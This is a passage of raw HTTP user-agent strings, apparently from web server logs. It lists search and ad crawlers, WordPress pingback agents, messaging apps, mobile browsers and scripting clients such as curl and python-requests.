tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631157490-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 PTST/210909.135341 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.79 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.7.3; https://www.expobizitsolutions.com +ddg_android/5.94.3 (com.duckduckgo.mobile.android; Android API 29) +WordPress/5.8.1; https://agulya.ru +yacybot (/global; amd64 Linux 5.4.0-84-generic; java 11.0.11; Europe/de) http://yacy.net/bot.html +WordPress/5.8; https://www.tecsplash.com +AvsDeviceSdk/1.23.0 +HTTPClientTest/1.0 +PHP/5.2.52 +PHP/5.2.33 +WordPress/5.5.1; https://www.diarioeleditorial.com; verifying pingback from 190.92.4.231 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.80 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-crawler-18@moz.com) +WordPress/5.8.1; https://fixx.one +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631289793-10 +CURL_UA +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631315914-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631235611-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631242611-0 +WhatsApp/2.2135.1 N +WhatsApp/2.21.19.3 A +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 8.0.0; SM-J727T1 ) U2/1.0.0 Mobile +WordPress/5.2.4; https://thailand.glowingghost.de +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 7.0; SM-N900 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Google-Apps-Script; beanserver; +https://script.google.com; id: UAEmdDd8kFrcP_TiYbXcueCndZ7nXLw_qz-0) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631247142-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631258901-0 +WordPress/5.8.1; https://gobanklogin.com +WordPress/5.8.1; https://news.cvelyser.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631365799-0 +python-requests/2.7.0 CPython/2.7.0 Windows/2003Server +PHP/7.3.14 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631320460-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631325931-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631325973-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631320883-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631328362-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631339139-0 +WordPress/5.8.1; https://pcec-counseling.org +FDM/6.15.2.4167 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.2.1113 (SpeedMode; Proxy; Android 4.4.2; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.8.1; https://blogchain.com.ua +WordPress/5.8; https://1agenstvo.ru +TuneIn Radio/18.0 (Android 30; SM-G780G; Java) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631406020-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631412962-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 +PHP/7.3.06 +YOURLS v1.7.4 +http://yourls.org/ (running on https://fw.ax) +WordPress/5.8.1; https://bepick.blog; verifying pingback from 191.102.170.219 +WordPress/5.7.3; http://gjstudija.net +WhatsApp/2.21.19.6 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631407496-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631414674-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631438349-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.83 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 5.1.2; Micromax_Q4101 ) U2/1.0.0 Mobile +WordPress/5.8.1; https://www.jackgermainhandbags.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 5.0; Micromax_Q4101 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631441325-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 PTST/210909.135341 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:89.0) adbeat.com/policy Gecko/20100101 Firefox/89.0 +okhttp/4.4.1 +PHP/5.3.95 +PHP/7.2.92 +PHP/6.3.12 +PHP/5.2.94 +WordPress/5.8.1; https://deposittanpapotongan.net; verifying pingback from 110.82.167.86 +WordPress/5.3.9; http://40.66.56.66 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631496838-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631502541-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631533103-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631548083-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631495203-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631502538-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631505040-0 +WordPress/5.8.1; https://cluster-shop.ru +Apache-HttpClient/4.5.3 (Java/1.8.0_66) + + +ShieldJavaSDK +huiwen_opac GData-Java/null(gzip) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631578696-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631584564-0 +WhatsApp/2.21.180.14 i +WordPress/5.8.1; http://282btc.com +Mozilla/5.0 (Windows NT 10.0; WOW64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 6.0.1; AS-5433_Secret ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 5.0; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile +WordPress/5.7.3; https://generiquepilule.icu; verifying pingback from 152.32.145.65 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.2.1113 (SpeedMode; Proxy; Android 8.0.0; AS-5433_Secret ) U2/1.0.0 Mobile +WordPress/4.7.21; http://durdenlaw.com; verifying pingback from 45.72.32.110 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631579274-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631585658-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631616677-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631631914-10 +WhatsApp/2.21.19.7 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631643435-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631643488-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631580203-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631587145-0 +WordPress/5.7.3; https://udil.fr +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631616515-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631647111-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Mobile Safari/537.36 PTST/210909.135341 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.8.1; https://www.expobizitsolutions.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631662469-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.83 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631662468-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631662468-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 5.1.2; SM-N900 ) U2/1.0.0 Mobile +WordPress/5.8.1; https://foundby.coreoutstanding.top +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631662470-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631612090-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631645035-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631627963-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631627964-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631627965-10 +Google email +WordPress/5.8.1; https://www.tutorialguruji.com +WhatsApp/2.21.19.9 A +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/93.0.4577.83 Safari/537.36 +PHP/5.3.89 +PHP/7.3.34 +PHP/7.2.27 +WordPress/4.7.21; https://centaur.co.ke; verifying pingback from 170.0.4.156 +WordPress/5.6; https://www.thedivorceangels.com; verifying pingback from 209.127.252.122 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631666224-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631671153-10 +WhatsApp/2.21.18.17 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631667722-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631672993-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631695938-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631718179-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631665648-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631670776-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 7.0; LG-X230 ) U2/1.0.0 Mobile +WordPress/5.8.1; https://policereferrals.org.au +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631665650-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631670777-0 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/610.2 (KHTML, like Gecko) JavaFX/17 Safari/610.2 +WordPress/5.7.3; https://archetix.com +WordPress/5.8.1; https://greyhatmarketing.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631726098-0 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/93.0.4577.83 Mobile Safari/537.36 +PHP/6.2.89 +PHP/7.3.19 +WordPress/4.9.18; https://blogs-fcpolit.unr.edu.ar/administracionpublica2; verifying pingback from 188.126.79.29 +WordPress/4.4.25; http://www.online-pflanzen-kaufen.de; verifying pingback from 170.84.230.158 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631805868-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631755265-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631765943-0 +WhatsApp/2.21.19.10 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631776082-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631790423-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631824624-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 5.0.1; IdeaTabA1000-G ) U2/1.0.0 Mobile +google/G011A (Linux;Android 7.1.2) +Java/11.0.12 +WordPress/5.8; https://listoffreeware.com +curl/7.19.7 (x86_64-unknown-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.2l zlib/1.2.5 +WordPress/5.8.1; http://www.282btc.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 4.4.4; LG-X230 ) U2/1.0.0 Mobile +libwww-perl/6.56 +PHP/7.3.83 +Apache-HttpClient/4.5.13 (Java/11.0.11) +PHP/6.3.15 +WordPress/5.7.2; https://blogsprdp.com; verifying pingback from 202.95.11.216 +PHP/5.2.85 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.88 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631840095-10 +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-crawler-30@moz.com) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631849523-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631887412-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631887852-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1631889848-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631889977-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1631897819-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631899323-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631843073-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631852784-0 +WordPress/5.8.1; https://tipstech.vn +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631875990-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631880553-0 +WhatsApp/2.21.19.11 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1631892440-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1631900610-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1631909868-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1631917756-0 +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/93.0.4577.83Safari/537.36 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Mobile Safari/537.36 PTST/210914.204639 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.hlfs-rest_client/1631911269-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.hlfs-rest_client/1631911330-0 +WhatsApp/2.2136.8 N +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.hlfs-rest_client/1631911269-60 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.hlfs-rest_client/1631911331-60 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.hlfs-rest_client/1631911268-0 +Apache-HttpClient/4.5.13 (Java/11.0.12) +GoogleAuth/1.4 (a32x RP1A.200720.012); gzip,gzip(gfe),gzip(gfe) +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1631937887-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631923842-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631931482-10 +PHP/7.2.83 +WordPress/5.7.3; https://lintasperistiwanusantara.com; verifying pingback from 110.232.67.122 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631923843-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631931505-10 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1631998982-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631926094-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631927195-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631934829-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631935628-0 +WordPress/5.4.7; https://box.teachablemoments.co +WhatsApp/2.21.19.14 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631923838-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) 